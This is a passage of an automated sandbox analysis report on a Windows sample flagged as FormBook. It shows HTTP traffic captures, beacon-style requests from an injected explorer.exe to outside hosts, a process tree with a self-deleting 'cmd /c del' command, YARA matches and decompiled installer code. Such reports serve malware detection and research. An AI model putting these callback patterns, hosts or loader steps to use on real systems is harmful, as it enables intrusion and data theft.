                                                                  Apr 8, 2021 11:06:58.188365936 CEST1180INData Raw: b8 b2 e0 b8 96 e0 b8 b6 e0 b8 87 e0 b9 80 e0 b8 a7 e0 b9 87 e0 b8 9a e0 b9 84 e0 b8 8b e0 b8 95 e0 b9 8c e0 b8 99 e0 b8 b5 e0 b9 89 22 0a 20 20 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73
                                                                  Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tiene
                                                                  Apr 8, 2021 11:06:58.188404083 CEST1182INData Raw: 22 0a 20 20 7d 2c 0a 20 20 22 65 6e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 73 20 64 65 6e 69 65 64 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61
                                                                  Data Ascii: " }, "en": { "title": "Access denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
                                                                  Apr 8, 2021 11:06:58.188433886 CEST1182INData Raw: 20 2f 2f 20 41 6c 6c 20 62 72 6f 77 73 65 72 73 0a 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 20 7c 7c 20 2f 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20
                                                                  Data Ascii: // All browsers navigator.userLanguage || // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target
                                                                  Apr 8, 2021 11:06:58.188469887 CEST1182INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.349727163.44.185.22680C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:07:19.043236971 CEST1221OUTGET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.tonton-koubou.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:07:19.424396992 CEST1222INHTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 08 Apr 2021 09:07:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/7.4.12
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Location: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD
                                                                  X-Cache: MISS


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.349735103.97.19.7480C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Apr 8, 2021 11:07:35.113116980 CEST4899OUTGET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.phillhutt.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Apr 8, 2021 11:07:35.378310919 CEST4899INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Thu, 08 Apr 2021 09:07:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1.0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: AQJEKNHnWK.exe PID: 1724 Parent PID: 5632

                                                                  General

                                                                  Start time:11:06:00
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: AQJEKNHnWK.exe PID: 4772 Parent PID: 1724

                                                                  General

                                                                  Start time:11:06:01
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Analysis Process: explorer.exe PID: 3388 Parent PID: 4772

                                                                  General

                                                                  Start time:11:06:07
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff714890000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: explorer.exe PID: 1156 Parent PID: 3388

                                                                  General

                                                                  Start time:11:06:22
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                  Imagebase:0x8c0000
                                                                  File size:3611360 bytes
                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: cmd.exe PID: 5560 Parent PID: 1156

                                                                  General

                                                                  Start time:11:06:26
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x11c0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Analysis Process: conhost.exe PID: 4228 Parent PID: 5560

                                                                  General

                                                                  Start time:11:06:27
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: AQJEKNHnWK.exe PID: 1724 Parent PID: 5632 AQJEKNHnWK.exeCOMMON

                                                                    Executed Functions

                                                                    Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89); // executed
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\hardz\\Desktop\\AQJEKNHnWK.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\hardz\\Desktop\\AQJEKNHnWK.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\hardz\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                                                    0x00403153
                                                                    0x00403156
                                                                    0x0040315a
                                                                    0x0040315f
                                                                    0x00403164
                                                                    0x0040316b
                                                                    0x00403171
                                                                    0x00403187
                                                                    0x00403197
                                                                    0x0040319c
                                                                    0x004031a7
                                                                    0x004031ad
                                                                    0x004031b2
                                                                    0x004031b4
                                                                    0x004031da
                                                                    0x004031da
                                                                    0x004031e0
                                                                    0x004031ee
                                                                    0x00403202
                                                                    0x00403207
                                                                    0x00403209
                                                                    0x0040320b
                                                                    0x00403210
                                                                    0x00403210
                                                                    0x00403220
                                                                    0x00403226
                                                                    0x0040328f
                                                                    0x0040328f
                                                                    0x00403291
                                                                    0x00403293
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040322c
                                                                    0x0040322f
                                                                    0x00403237
                                                                    0x00403237
                                                                    0x0040323a
                                                                    0x0040323f
                                                                    0x00403241
                                                                    0x00403241
                                                                    0x00403242
                                                                    0x00403242
                                                                    0x00403247
                                                                    0x0040324a
                                                                    0x0040327f
                                                                    0x00403284
                                                                    0x00403289
                                                                    0x0040328c
                                                                    0x0040328e
                                                                    0x0040328e
                                                                    0x0040328e
                                                                    0x00000000
                                                                    0x0040324c
                                                                    0x0040324c
                                                                    0x0040324d
                                                                    0x00403250
                                                                    0x00403258
                                                                    0x0040325b
                                                                    0x0040325d
                                                                    0x0040325d
                                                                    0x0040325d
                                                                    0x0040325b
                                                                    0x00403260
                                                                    0x00403266
                                                                    0x0040326e
                                                                    0x00403271
                                                                    0x00403273
                                                                    0x00403273
                                                                    0x00403273
                                                                    0x00403271
                                                                    0x00403276
                                                                    0x0040327d
                                                                    0x00403297
                                                                    0x0040329b
                                                                    0x004032a4
                                                                    0x004032a9
                                                                    0x004032aa
                                                                    0x004032af
                                                                    0x004032b3
                                                                    0x00403316
                                                                    0x00403316
                                                                    0x0040331b
                                                                    0x00403323
                                                                    0x0040344e
                                                                    0x00403455
                                                                    0x00403471
                                                                    0x0040347e
                                                                    0x00403487
                                                                    0x00403489
                                                                    0x0040348b
                                                                    0x0040348d
                                                                    0x0040348f
                                                                    0x00403491
                                                                    0x00403493
                                                                    0x004034a3
                                                                    0x004034a5
                                                                    0x004034a7
                                                                    0x004034b4
                                                                    0x004034c3
                                                                    0x004034cb
                                                                    0x004034d3
                                                                    0x004034d3
                                                                    0x004034a7
                                                                    0x00403493
                                                                    0x0040348f
                                                                    0x004034d8
                                                                    0x004034de
                                                                    0x004034e0
                                                                    0x004034e4
                                                                    0x004034e4
                                                                    0x004034e0
                                                                    0x004034e9
                                                                    0x004034ee
                                                                    0x004034f1
                                                                    0x004034f3
                                                                    0x004034f3
                                                                    0x004034fb
                                                                    0x004034fb
                                                                    0x0040332f
                                                                    0x00403336
                                                                    0x00403336
                                                                    0x004032bb
                                                                    0x00403306
                                                                    0x00403306
                                                                    0x00403312
                                                                    0x00000000
                                                                    0x00403312
                                                                    0x004032c4
                                                                    0x004032d1
                                                                    0x004032c8
                                                                    0x004032ce
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004032d0
                                                                    0x004032d0
                                                                    0x004032d0
                                                                    0x004032d5
                                                                    0x004032d7
                                                                    0x004032dc
                                                                    0x00403342
                                                                    0x0040334a
                                                                    0x00403350
                                                                    0x0040335f
                                                                    0x00403361
                                                                    0x0040336a
                                                                    0x00403375
                                                                    0x0040337f
                                                                    0x00403387
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004033c9
                                                                    0x004033d2
                                                                    0x004033de
                                                                    0x004033ee
                                                                    0x004033e0
                                                                    0x004033e6
                                                                    0x004033e6
                                                                    0x004033f9
                                                                    0x00403403
                                                                    0x0040340e
                                                                    0x00403415
                                                                    0x0040341b
                                                                    0x00403422
                                                                    0x00403429
                                                                    0x0040342c
                                                                    0x00403432
                                                                    0x00403432
                                                                    0x00403429
                                                                    0x00403434
                                                                    0x00403434
                                                                    0x0040343a
                                                                    0x0040343e
                                                                    0x00000000
                                                                    0x00403449
                                                                    0x004032de
                                                                    0x004032e1
                                                                    0x004032ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004032f4
                                                                    0x004032ff
                                                                    0x00403304
                                                                    0x00000000
                                                                    0x00403304
                                                                    0x00000000
                                                                    0x0040327d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403231
                                                                    0x00403231
                                                                    0x00403231
                                                                    0x00403232
                                                                    0x00403232
                                                                    0x00000000
                                                                    0x00403231
                                                                    0x00000000
                                                                    0x00403295
                                                                    0x004031bc
                                                                    0x004031c8
                                                                    0x004031d4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    • #17.COMCTL32 ref: 00403164
                                                                    • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                    • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                      • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                      • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                    • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\AQJEKNHnWK.exe" ), ref: 004031E0
                                                                    • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 004031F5
                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000020), ref: 00403220
                                                                    • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                    • ExitProcess.KERNEL32 ref: 00403336
                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                    • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                    • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                    • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                    • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                    • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                    • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                    • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                    • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                    • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                    • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                    • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                    • ExitProcess.KERNEL32 ref: 004034FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
